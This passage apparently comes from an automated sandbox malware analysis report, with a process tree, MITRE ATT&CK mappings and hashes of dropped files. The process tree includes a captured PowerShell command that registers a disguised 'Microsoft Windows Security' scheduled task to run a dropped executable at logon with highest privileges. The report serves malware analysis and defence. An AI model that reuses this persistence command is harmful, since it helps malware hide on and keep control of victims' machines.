        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:6612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4800
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:1244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5492
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:4280
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:5704
- C:\Users\Admin\AppData\Local\Temp\3SK30YVevJ7wfKe0esfBJ\Y-Cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\3SK30YVevJ7wfKe0esfBJ\Y-Cleaner.exe"
  2⤵
  - Executes dropped EXE
  PID:1340
- C:\Users\Admin\AppData\Local\Temp\3SK30YVevJ7wfKe0esfBJ\Y-Cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\3SK30YVevJ7wfKe0esfBJ\Y-Cleaner.exe"
  2⤵
  - Executes dropped EXE
  PID:2924

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1204

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1680 -ip 1680
1⤵
PID:2916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 380 -ip 380
1⤵
PID:2792

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 400 -ip 400
1⤵
PID:2396

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3940

C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
"C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
PID:5808
- C:\Program Files\McAfee\WebAdvisor\UIHost.exe
  "C:\Program Files\McAfee\WebAdvisor\UIHost.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5400
- C:\Program Files\McAfee\WebAdvisor\updater.exe
  "C:\Program Files\McAfee\WebAdvisor\updater.exe"
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5200 -ip 5200
1⤵
PID:5192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\IMG001.exe:P

Filesize
6B

MD5
9fc3796ee0d2bb42d79fe1b5ce106122

SHA1
d15d023df3c9ee8d1306488308f20bb571e5b89c

SHA256
41fdbb429f5f3a0c95ab831c845b5102a7d64762d6b4b8aebea8ff764183ddd4

SHA512
34fee1699f6be54eb867bd8f208c9b003ec57754236caf8d355e5be508d3e2003606c2b29ca60760b97848fda499bb13ae8656901365bfad2dcacf367c009c21

Download Submit
C:\Program Files\McAfee\WebAdvisor\Analytics\dataConfig.cab

Filesize
74KB

MD5
f228d54f9f96d109503d3bc2099be95a

SHA1
792b2e746a60da1421fe382de3b249b5a4e0f261

SHA256
c796fe516023a91228c2f53ad26e3d32424b7fa6f881779f4b95b23773dfccc0

SHA512
e651f9b9e4569429720712f5ee857ac6c97bc6cb133e420fbb92c952f1e8760772e69e0ada243595f9d4fa12a7ccddaedafb30fe4a93be981d7530961de7496e

Download Submit
C:\ProgramData\McAfee\WebAdvisor\LogicModule.dll\log_00200057003F001D0006.txt

Filesize
1KB

MD5
3f556d318397b47f6f3f1d60f1beb80b

SHA1
d2b04745b494e7e8d06d5f5e9cc1320d52a97c09

SHA256
cbb7230a2be0906abcf39bbd6304dc1863bc631636b5088c624fc12932fd81fc

SHA512
5c88ac4f03693e1736b2966d1e223b93ccd1e0a3a6007f4117eb4892beba4fc15e7b917af90fb6fd46d59adf7b2aaf63a3994570d0aadc3865cf4ed5509e128b

Download Submit
C:\ProgramData\McAfee\WebAdvisor\LogicModule.dll\log_00200057003F001D0006.txt

Filesize
1KB

MD5
ddd424bc12d43fed8b3527b65710e4fa

SHA1
99b18aa7af4e6c5ae016813f3aed1822b03ae190

SHA256
403d7dc242f25590f90dee45019f50e6afe6e16d850268956fce977ffa54a752

SHA512
42b85ab482c29b6e6d69311a58846987888236652ff2b6e9d0f60c712fdaf965a0b3a1866d5cc098bdab09eaecd12d4cf01796cf8a4b0331f6fa5f30ad0a028c

Download Submit
C:\ProgramData\McAfee\WebAdvisor\LogicModule.dll\log_00200057003F001D0006.txt

Filesize
2KB

MD5
b7994625470878fb6bc9679154b4a4ab

SHA1
459202c4ed8514f1b888f20363342eec9ee82fa6

SHA256
d202ef45356b04465a13a6ac7c4429a8641f00eff05d167bbf9444ad86ebc8e2

SHA512
d86b3029f6eb268fcb2cb5e0eacfd03af5f900db55a84643991f2188c4f1aa8539e54f23231715051bdcc8432aa418ad3515a87ed25bc04549e21ca001938d80

Download Submit
C:\ProgramData\McAfee\WebAdvisor\LogicModule.dll\log_00200057003F001D0006.txt

Filesize
3KB

MD5
0dade989e6225d6326c6cd7b31aa9032

SHA1
dd082751941f50e866d392fb0fefc4e602672594

SHA256
abbd1df5f19ec901823a96494b9f69762297104f25cd670fa28e46b9ffdb6056

SHA512
12a0da1ae29a02ec578c475557e9dff7f78d7909a6c5b77ac08c5e91a6f902cba410d18140e8efc177b213a0572210753e63513986ed92f50a54ec8c6a505bcb

Download Submit
C:\ProgramData\McAfee\WebAdvisor\LogicModule.dll\log_00200057003F001D0006.txt

Filesize
4KB

MD5
0735d4796e41493af53f7c21ad117222

SHA1
b91b7603c16f834aad428154e327fb8bbefeeb5a

SHA256
69ebbcd7d484fc6b94d52a23590e06606d4c50242b47a1b1f28b6c46647bdba8

SHA512
eb55614bc34ed76c3ea83dc73ac1f766cd0f71a72ffef7ea8ef1005763f81ebdcb13d5720a82e1d30b1038ea061d3f1d5d6bc5b8b163d685c790c6138b8b0399

Download Submit
C:\ProgramData\McAfee\WebAdvisor\ServiceHost.exe\log_00200057003F001D0006.txt

Filesize
4KB

MD5
5ae8ab6d8bc1a0bdead59a7dab506f6b

SHA1
e1cb7850b65702d965dcc96d347c473ef92fcc67

SHA256
d61028d5b4c0ba628f46b1b8094b208b3b42a9e20f538fead08fcff218f2c12b

SHA512
7ef82ff1de906c6abec2c6241d61b95c674fc078c7610f1dd2e98164db6966df2e9b52c6055d5cb82e35e3c9688055002abde6d14db903dbc24a1be378e4b3ad

Download Submit
C:\ProgramData\McAfee\WebAdvisor\TaskManager.dll\log_00200057003F001D0006.txt

Filesize
748B

MD5
484f39d7b8becc0df3c12ae881a81dd6

SHA1
87c43fb80d9a6169a1da694d3fc2bca3b74d9e38

SHA256
00330f6f1f4b3389ea4ea4efc35f1ed6e0144208add3bb1fbf83718a9d089e46

SHA512
90718136efa937814c470f03e8391ed22863c99fab0b0745f6b5a096de76c6210cf0007511289ac280bab1866be3268bdc0f45af60137ebc581fc67b078efdc6

Download Submit
C:\ProgramData\McAfee\WebAdvisor\TaskManager.dll\log_00200057003F001D0006.txt

Filesize
1KB

MD5
304d5df2c15639522a64c84e5bf0ca45

SHA1
651ca087532cbed41a2f53faea248a52c776e7c7

SHA256
b6253e96da805502bbf2fad5609e032917e03942bd64a582b53130681c3725a6

SHA512
bdfcf66575f20e71ecad3580d4073f21330992e0411ffb830edd2a1cf656c1603a4d36d58003d41dfcb245b34937de927163cc60edac78aa229941272659b6a4

Download Submit
C:\ProgramData\McAfee\WebAdvisor\TaskManager.dll\log_00200057003F001D0006.txt

Filesize
2KB

MD5
0832bc9d8372eb6025e51aa3dbb44af8

SHA1
02e55eec479d3c232caec2343d8bb453071f7b56

SHA256
24e1f12502a27a8df3e156887412e32d49923ca7060afa9c0d544715ddfa3ad7

SHA512
396f6cf74a0b8f72cb6a6661e4ff85a4b4a7335b3139269b636e9d24cb59e98460d302488951f450538cf4bc5063d40e5dca26a6070f32d5af9f5dffde70a196

Download Submit
C:\ProgramData\McAfee\WebAdvisor\TaskManager.dll\log_00200057003F001D0006.txt

Filesize
3KB

MD5
9853ca9dc5cfa48f63a6d67ee4944491

SHA1
0d6b61d58f918468344c2fccd29431b6359c5595

SHA256
e552a202c9cef3cf792eb96b66ac55e9c498a9ec4ed8ffd8fe980b1288851327

SHA512
7b24c20a47fea20da81b0f30ad81ff8eb6fc9d0dabb74db643c1b69ef2cf735df6c7e377affe47922c13e030a9aab7faf8f8140ade8b9eb1751639f1c9fe9ada

Download Submit
C:\ProgramData\McAfee\WebAdvisor\TaskManager.dll\log_00200057003F001D0006.txt

Filesize
4KB

MD5
f7c76901dbe3ad127aba206fbb0d1706

SHA1
358758becf24b840b168cb0ac09ba7075b3fd11c

SHA256
817945664b4d292f923a052dc23d0736e99b7da39494debd1fa68bbf30fe5219

SHA512
8f139b560f4f67a83afece1f0d8891aa358f3020a462d080094519a9771d42a94e058c0124e40e422ed1eaf66d37dbd1e63cdd4e83436ea593f9dc0d9b26859b

Download Submit
C:\ProgramData\McAfee\WebAdvisor\UIManager.dll\log_00200057003F001D0006.txt

Filesize
2KB

MD5
75291873d72a025f206732d8d31826a1

SHA1
92ee1a3e07a65337a3100b842193cfaa3c497a36

SHA256
e27a9ac1ac3c1c98526d39c1585c6402ecb6c391ca0512cc233316330b16fe63

SHA512
951451d7b7072b63c4666d3dcbe0b9e5b1728c9eb73b6abd1c882e342ead550c649f54ba3b7b15068a10f3703070a4b1193b63e71ca07008c27a870b6499acd8

Download Submit
C:\ProgramData\McAfee\WebAdvisor\updater.exe\log_00200057003F001D0006.txt

Filesize
1KB

MD5
eada259f2b9b56184a3b3f9634b3f5ee

SHA1
e91bb5092cacfcb391c16c6b6a9cdd60228f178f

SHA256
ec4fb5781850d4a56f4b868ce99d842c8946bed9e788b2c4ffd4428e310f9d86

SHA512
ceb49743b161b24cb7f4fe11746e0d6bb92f61c5dca21503997c8b5aa13a5cfbdd4b3d27315ee28c9f3141daed6221c27d1ff5265f91159255bf29c838c9640f

Download Submit
C:\SAF\SAFMan\Config\actives.cfg

Filesize
5B

MD5
c9584c31a9f2357bb029d300adc707f8

SHA1
76d5a8ab3c2e5fd7d09e6489ea3b9dfa43620eac

SHA256
1e62542d131745fc4c3ebf51080463d7c1f9d34e4e209784ab34cecea35d42c6

SHA512
5b5ff3e34e8378c56398093d427a966e0b48cf4a1451d71e601d1ab971f182855954c75c77d82e64b1762fa320e7b6699e8088d2e1927f34b49596c89ba4673a

Download Submit
C:\SAF\SAFMan\Config\configs.cfg

Filesize
481B

MD5
bda47b06257aac476084f708be10f6b9

SHA1
095e4aa90b7cedb75ca85e3bafd0ceb853fc9614

SHA256
c751260edea68668173cfb6350c7e7221c3c4986391dec4bc57d6e9efac0abb7

SHA512
c4906cf781054f7b03247a469b6e184eeee12a35d51987ee0e268d01c51b5080173da0344284e43750382c7defb2bfd39ce3e8460df2462523d08695cae97fb9

Download Submit
C:\SAF\SAFMan\Config\configs.cfg

Filesize
617B

MD5
0ff89bd10a280df9e67f68f3eab3bbba

SHA1
9ceeca47324660634c0390e947461834d0cb7f4b

SHA256
b69471f8e505456ccfc7f797f2b4ddf0901bd7631dc79126c5552f23caefbd9b

SHA512
e3e98a24dca92c206288689badcad3c5273ed3e8d53f55684ed66586ec55f895014eb1db3347ba525d81f3a02ff2e55a49819e13e6816499a7f95170f4a492d8

Download Submit
C:\SAF\SAFMan\Config\configs.cfg

Filesize
734B

MD5
b4a3d7ee17cbc7899373cedcea30cc50

SHA1
2e16141b64b905c019c6f5f4caa6098a07dd1e8f

SHA256
1685d8cba9e234432511d4cc25c88e7600fd5f58d5ea7d217d39f30f02422b0e

SHA512
8792a234b7ded0b67bad4a1649612c8ee0c08053d59f5c9f644f39a29899792b98ad0d9d2f36d982cdc6f99eb9dc810e5f0d6ae1e75748fe116cebb8edc75cb1

Download Submit
C:\SAF\SAFMan\Config\configs.cfg

Filesize
734B

MD5
ffa274097470fc1bb71dfe86f9aee0bd

SHA1
e3ce0f3897eec13090c14aabb54b18e84d3ee9ac

SHA256
7674a50a6a9d2bba42735cfcde7e315a3f3268c30cb56b26e82794bbb180b190

SHA512
8ae29e8f890caa386e6f43803037689e6b1b96ba03c6e832666d37ac251e5151ad41af2dbe106c78cc8bad6e03b7de3bc86f652f116c24de13e6036debc95f11

Download Submit
C:\SAF\SAFMan\Config\toolex.cfg

Filesize
48B

MD5
59062045bfcbf8c31517583b8c71d954

SHA1
900539b375641e82b09356955749e15dd6cedaaf

SHA256
00a0113dc8023255df9f56b17a3232a396174df64bd29d5b405e922d215f1609

SHA512
840118c7de1203abb725d1c4f347099424442dfb20a6eaf26ce7adcc94bf496e12864f6d8de96866111b2df6445a3efc5abf83aad16aed1a68d8fbb47c67b211

Download Submit
C:\SAF\SAFMan\Config\toolex.cfg

Filesize
1KB

MD5
90f198f6c95d765dfc4c33cc2498ed5c

SHA1
f955ea14bbb9acbb8b0282510f14eb0345e78a60

SHA256
3db5feeac9f53a84068d03a5bfd1288d5cde2c56fe4852bf25cad63e2be564d8

SHA512
bea41e3f18df7ff61cc0a9821d87b8d661728e71a6e62c8e1fb002b07a2d7a3a8cec4974887bec79c0fef1e6d2f27d06863b3b4a0b0f9412eae9a157b1ef5036

Download Submit
C:\SAF\SAFMan\Config\toolex.cfg

Filesize
1KB

MD5
23fa786408910d904c94453df5c3c687

SHA1
79e6ec15559598a9ade97b31b6c808e1d9778104

SHA256
646485cddea3bd5a2dcecde571ce9bd2b20c8a39187b175bc735e8804ce7aaf7

SHA512
143e24d3e7bd90da2be6ba1b5af5525cb580e40b0636828214adde5b88e77cab775e087c4b130e7559a7ef209fb66f2166e4825cf93d4e36a9b8e11daa6a45d7

Download Submit
C:\SAF\SAFMan\safman.exe

Filesize
16.1MB

MD5
e7ad1f69ed7db29d887cef2e336152c5

SHA1
016cf7411c05e042b5694c1351c6a889834c5221

SHA256
28303bf684888aba8e7f8b27211d306d7447838742dc4f2917ed68f5f80df650

SHA512
1905aee733d7dfe12c04a366f68306a73a5af2e5281e2cf1f70c73d293a719f7733a6f67a17f5ac56bc6e6d6ffd65d76cdf60138ade266fc1ab8a843f8a0ff4a

Download Submit
C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.scr

Filesize
1.0MB

MD5
c63860691927d62432750013b5a20f5f

SHA1
03678170aadf6bab2ac2b742f5ea2fd1b11feca3

SHA256
69d2f1718ea284829ddf8c1a0b39742ae59f2f21f152a664baa01940ef43e353

SHA512
3357cb6468c15a10d5e3f1912349d7af180f7bd4c83d7b0fd1a719a0422e90d52be34d9583c99abeccdb5337595b292a2aa025727895565f3a6432cab46148de

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024112718.000\NetworkDiagnostics.debugreport.xml

Filesize
137KB

MD5
d2c6343aa32a5b884c7d5f65677042b9

SHA1
f28b99045c3bf9a8b0517829edb6f2b8189f5350

SHA256
0c087dd54fcadd19c492e8d4cc38416a697084d8d89f0e85ab9fed4c49d87054

SHA512
390fb4038840a0cb4d77f035dadbaf5aae9d8bd38f4d14a6735f3a2871955459e32175d4f8ad8b7148dd07b44aff6f487ec7c61c6c3621f5e30be177b610c4bf

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024112718.000\ResultReport.xml

Filesize
38KB

MD5
fe08b527126f4f933f62e32539bf0feb

SHA1
8fcf9b9d407f2e9915d9f550785e07fb6b4bd903

SHA256
70c67be8415da365e9874acd9cef6090735cdc4009d19d9ccdf0c610c29db589

SHA512
365ac13f4cdd848d0818b5f9d86a640ca0553e29c2b135dc445fb8e09d167188fd57ce6b6d8716bc6123b57a8a7a2ea4fce1ba32cc3395fb8ae8001626e9cf55

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024112718.000\results.xsl

Filesize
47KB

MD5
90df783c6d95859f3a420cb6af1bafe1

SHA1
3fe1e63ca5efc0822fc3a4ae862557238aa22f78

SHA256
06db605b5969c93747313e6409ea84bdd8b7e1731b7e6e3656329d77bcf51093

SHA512
e5dcbb7d8f42eabf42966fccee11c3d3e3f965ecc7a4d9e4ecd0382a31c4e8afea931564b1c6931f6d7e6b3650dc01a4a1971e317dab6c1f03932c6b6b7d399f

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024112718.001\NetworkDiagnostics.debugreport.xml

Filesize
70KB

MD5
b9ad5c38c023e4fb458456b9a72c1a9f

SHA1
1295459cbecd0edfde4d2aea5405b94f59c1e1a5

SHA256
6860e13c4d6eb4710ad6c6d4a84d9e47653e6eb476964cd7d6aeca2d0d0fca38

SHA512
e52023c437c4d5f17cb32674b09b6e2d6148b05a17e57040830628fc669f93c9454c2f0f056c1f2c9b48f0304099fec28640f93acb840055e1732e46cfb8ef15

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024112718.001\ResultReport.xml

Filesize
38KB

MD5
d0814e02b0c3248ae25ad2e8daa32d37

SHA1
0cd1dbca3ea3315fe21f6a396f95946960739f86

SHA256
3439acf47a38d6743c98b7c9012121c4e51fd9f0f7a2830559705c286ea7150b

SHA512
3570b70ffba296d0c2f42e0c91da8be596ef3f641bc4c87c0e7123e4533ac7f028d7fff9bef4f714a5ea9e46aa714e515065212e4a3e6b24db5ad6838c92a1f2

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024112718.001\results.xml

Filesize
388B

MD5
44b0d8d3e15140aded6a8008bef034d7

SHA1
b7a1ad2eab3fed4f5ccbb6edbfc96cc591378667

SHA256
4094471747b4b5bad9230666f383dc2542c81ce4719fd3fa7083aa3975c82ee7

SHA512
2669fa667f0c1052051cebd0a2d0dab499eba85d186e0ad22b79f2599a6ced195c6ed047be0f8edb1c942445f9c497c2638807c1599db643bc49aeafc57d35fc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
3940148bb31c739fe5a813002002bb78

SHA1
8c934f084062d305772a6643a8610c3a4587f95b

SHA256
b23186f7aebb73adbbc3edab05170def7edd8081ef6cbf4c802db559f5a8d538

SHA512
feb308a2c3f1263afeb806eb34e0dd986f735ed08bea4e2692ab73c3c8b52907d2947d6cefe259888dae95e86d3c7ae0dc3b38777b94cf73e326ec5b5df1a6be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
bc6b81d2a4ecdc3c0b20a2b8e651e66b

SHA1
28d5ece6c41cfde699e72d8bf8aead253de004b8

SHA256
0616743dae0dd67dee40a05bcd8028233aad73cf5263925a0357fc5c774160b7

SHA512
d4b0ef5ddbb6a3d0f6e1648f907d19f1ea18e27d1f064d05c655dcd9e66dd2b5cb5e1128e1f6f3466040059d8e7da4ed84fd926fd7c9f947e7912e61feccf419

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

Filesize
41KB

MD5
e319c7af7370ac080fbc66374603ed3a

SHA1
4f0cd3c48c2e82a167384d967c210bdacc6904f9

SHA256
5ad4c276af3ac5349ee9280f8a8144a30d33217542e065864c8b424a08365132

SHA512
4681a68a428e15d09010e2b2edba61e22808da1b77856f3ff842ebd022a1b801dfbb7cbb2eb8c1b6c39ae397d20892a3b7af054650f2899d0d16fc12d3d1a011

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
aa0e7bf9d23186d103fb27a220cceec8

SHA1
0bb4fd3cf5b2990d2d13947f6d6d2062c69b6187

SHA256
603899f3aa84631c75eac48ad94ad0774d36327ed4f19092a0f2955e4bff1565

SHA512
99044312f25bdd1a9527f62a50675552581f731409f666aad1413a73d7ced618512fdcc47eac55d67e0f5e5446b5a00fe12028aa37ec1d32996f9665407c1c49

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
52aacfc54feeb2d628abcf7a9f1376e0

SHA1
02e76681e6e755c91f3f15154e6f348ff36d95d9

SHA256
31183e0df30f6e1b9015f787a81fdaa44ceb1e3c40eee2e9d20419c926e0dea0

SHA512
33d2cf3047d975cabd493148aa82341b6143a0cb2fe9e5711acd52a6e9a5121a435f96031bfdbc9e5cdd9252943639a5c49f29974d7dfaa7d0eb52a9d6ec9fe1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
ce100cc0eee4765282232bac4cdffdfe

SHA1
2a05af8003ad2e6de4840dec313d1a5fe6251b3a

SHA256
14f849d2be9b8f4b8a970fa3f21c510c3ba4e527beeda5b95495eb9929aebd06

SHA512
56c9e1ea7455cc702a71c0fa286f5cbed7d5f69e6a62f9192efe778428c862e1f6dc4ffedc5f094ecc4a54fa53d6ae53d565e347e3cc560b3a3f0418ca7666b6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
3dcd35295d7a2c07538c46c0051fa78b

SHA1
78b27deb28174c633a2cad02749aa23b6da8ab26

SHA256
d1dbe7a9b12b49211ea3dbff5b0336a5b1ca3386265a7c41fcf791c3b5d08eb0

SHA512
9404c96bdac9eed64924d4d20b9369b48a8c73babbc539631a52906667cd2ab8f43fcb3edebc5f43b78d7a825ea92019bcc8c7a1a86b598c913a215cd26af402

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
1b25ce082d9db5b761dc140184f53fdb

SHA1
009b3b74a46295dc0a54885c2a99f8246cf99f32

SHA256
bfdc396e99bae7694c149da94636f030520431ef9c0174e688f36521443a675d

SHA512
5646032e4f06f61b61fb9c49279d4daac2c14b39f5bbd3b5034276eaf02d46e7e76d66bd0e6c87445dc8bbd70e30e2c9857566da5739d72504a14ee87b0525ae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
94d351425aa745fa2b0d83825a23547c

SHA1
a8041d55773a2d2371fd64c667d73402d467859d

SHA256
8c7635e2c8855017fca19f07a28fc8cc83603e67f68315268652975fa5703a15

SHA512
764bb67fcc20226da086003bc4a9972060d5880c86dd89d39a5637d61cd05d841da2c213129c1680fe0a0f883493d5d08a11ba9f07b12ccaab662aa5168ef714

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
c4f8c548019cd2941b0aa138b73bad33

SHA1
ccb5f71f473bb2852e3750621d9559c537d1849c

SHA256
a0f6385dffde333e6103af037943ddf50cb56c6df71c0b8d93c0c3a1be070cd3

SHA512
